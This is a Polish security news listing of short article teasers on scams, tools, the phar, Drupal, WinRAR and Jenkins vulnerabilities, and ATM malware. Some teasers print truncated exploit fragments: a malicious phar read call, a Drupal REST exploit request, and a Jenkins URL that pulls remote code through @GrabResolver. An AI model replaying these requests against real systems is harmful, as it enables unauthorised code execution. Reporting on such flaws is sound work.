Być może jest to w ostatnim czasie najskuteczniejszy skuteczny „przekręt” kończący się kradzieżą pieniędzy. Tym razem Sylwia skarży się na SMS-a od otomoto, w którym czytamy: Wczoraj wystawiłam samochód na otomoto.pl dzisiaj dostałam SMS do zapłaty jeszcze 76groszy po wpłaceniu z konta ściągnęli mi 3500,76 zł . Podali się za…
Czytaj dalej »
Wireshark jak to Wireshark – służy do analizy komunikacji sieciowej i nowa wersja tego nie zmienia ;-) Największe zmiany to pewne odświeżenie interfejsu użytkownika, czy obsługa masy nowych protokołów. Pełen changelog możecie zobaczyć tutaj. Z podobnych narzędzi polecam też scapy, lub ewentualnie już bardziej odległe funkcjonalnie narzędzie – NetworkMiner. –ms
Czytaj dalej »
Tutaj film przygotowany na ostatnie sekurak hacking party przez Michała Bentkowskiego. Całość trwa niecałe 7 minut + czas potrzebny na myślenie (spacją możecie odpalać kolejne sekwencje). Zobaczycie realny przykład appki chatu (od Google) napisanej z wykorzystaniem Electrona. Klikacie na coś z chatu, a tu bum – wykonuje się kod na…
Czytaj dalej »
Mowa o sprzęcie izraelskiej firmy Cellebrite. Tego typu urządzenia są sprzedawane w cenie $6 000+ i służą do zapewnienia dostępu do telefonów, które zostały odebrane np. osobom podejrzanych o przestępstwa. Ale jeśli powiedzmy odpowiednim służbom znudzi się używanie sprzętu – sprzedają je na eBay…
Czytaj dalej »
Artur Czyż to człowiek, który zaskarbił Wasze serca na ostatnim sekurak hacking party – prezentacją na żywo w temacie: wysyłam SMS-a, a kolejnym SMS-em podmieniam tego pierwszego. Jak to zrobić? Artur tłumaczył, że to wszystko jest w dokumentacji i wskazywał dokładnie co to jest to 'wszystko’. Przy okazji zerknijcie na…
Czytaj dalej »
Temat problemów bezpieczeństwa formatu plików phar, został uznany tutaj za jeden z 10 najbardziej innowacyjnych hacków 2018 roku. W czym problem? Sam dostęp do pliku złośliwego phar, np. w ten sposób: file_get_contents(’phar:///tmp/phartest.jpg/’); powoduje wykonanie złośliwego kodu po stronie odczytującej. Dlaczego? W pliku phar, można umieścić zawartość zserializowaną, która przy odczycie…
Czytaj dalej »
Zazwyczaj nie zajmujemy się tego typu sprawami, ale historia może mieć jeszcze ciekawe reperkusje i finalne zakończenie. Pierwszy skazany to Siergiej Michajłow w randze pułkownika, były zastępca szefa jednostki zajmującej się cyberbezpieczeństwem w FSB – 22 lat więzienia. Rusłan Stojanow – były pracownik Kaspersky Lab – 14 lat więzienia. Rosyjski sąd skazał…
Czytaj dalej »
TLDR: podłączasz urządzenie do portu USB-C… ktoś może mieć roota (admina) na Twoim systemie. A to tylko przykład – możliwe jest czytanie ruchu VPN (w plaintext) czy dostęp do naciskanych na komputerze klawiszy. Mimo łat producentów OS (problematyczne okazały się w zasadzie wszystkie systemy: Windows, Linux, OS X, FreeBSD), autorzy badania dają tylko jedną radę na najlepsze zabezpieczenie…
Czytaj dalej »
Czasem pojawia się pytanie – nie będę zabezpieczał swojej aplikacji, ale skonfiguruję WAF-a. Czy mój system jest bezpieczny? To zależy – czasem bezpieczeństwo wzrasta, a czasem drastycznie spada. Ktoś znajdzie jedno ciekawe obejście i bum, słowa pana sprzedawcy-marketingowca są nic nie warte. WAF dał nam mylne poczucie bezpieczeństwa – z…
Czytaj dalej »
Mega sekurak hacking party. W ankietach wskazywaliście często (patrz koniec tego wpisu): super prelegentów, świetne miejsce, sprawną organizację, brak reklam i zero marketingowego bullshitu. Mini relacja.
Czytaj dalej »
Niewiele trzeba było czekać na analizę ostatniego patcha wydanego przez ekipę Drupala. Jeśli mamy dostępne API RESTowe możemy wykonać taki request: POST /drupal-8.6.9/node/1?_format=hal_json HTTP/1.1 Host: 192.168.56.101 Content-Type: application/hal+json Content-Length: 286 { „_links”: { „type”: { „href”: „http://192.168.56.101/drupal-8.6.9/rest/type/node/article” } }, „type”: { „target_id”: „article” }, „title”: { „value”: „My Article” },…
Czytaj dalej »
Właśnie załatano krytyczną podatność w Drupalu. Wiemy na razie niezbyt wiele – na pewno można ją wykorzystać bez uwierzytelnienia oraz ma ona miejsce w module API. Warunkiem możliwości wykorzystania podatności jest prawdopodobnie udostępnienie / włączenie jakiegokolwiek API. Więc na szybko Drupal zaleca wyłączenie metod RESTowych: PUT/PATCH/POST (choć najlepiej podnieść do wersji…
Czytaj dalej »
Podatność w WinRar (dokładniej mamy ich w sumie aż cztery: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253) umożliwia wypakowanie pliku z archiwum do dowolnego miejsca na systemie plików. Np. wypakowanie złośliwego pliku exe do katalogu autostartu w Windows (malware odpali się za każdym razem po restarcie systemu). Jak pisze Checkpoint: Akcja na filmie…
Czytaj dalej »
Akcja na filmie tutaj poniżej. Sam exploit jest stosunkowo prosty (do stworzenia od zera nawet na poczekaniu) – choć dojście do niego zdecydowanie nie było banalne. Całość sprowadza się do przygotowania na swojej maszynie stosownego pliku, a następnie odwołanie się do Jenkinsa (bez uwierzytelnienia) zwykłą przeglądarką: http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name=’orange.tw’,…
Czytaj dalej »
Sporo bankomatów nie jest aż tak bezpieczna jak się wydaje. Kaspersky opisuje ciekawą rodzinę malware na bankomaty. Interfejs wygląda nieco podobnie jak w jednorękim bandycie. Po instalacji przestępca wybiera kasetkę (1-4) oraz naciska SPIN (podobnie jak na popularnych automatach do gier). SPIN zaczyna wypłacać pieniądze, STOP zatrzymuje wypłatę, a SCAN sprawdza…
Czytaj dalej »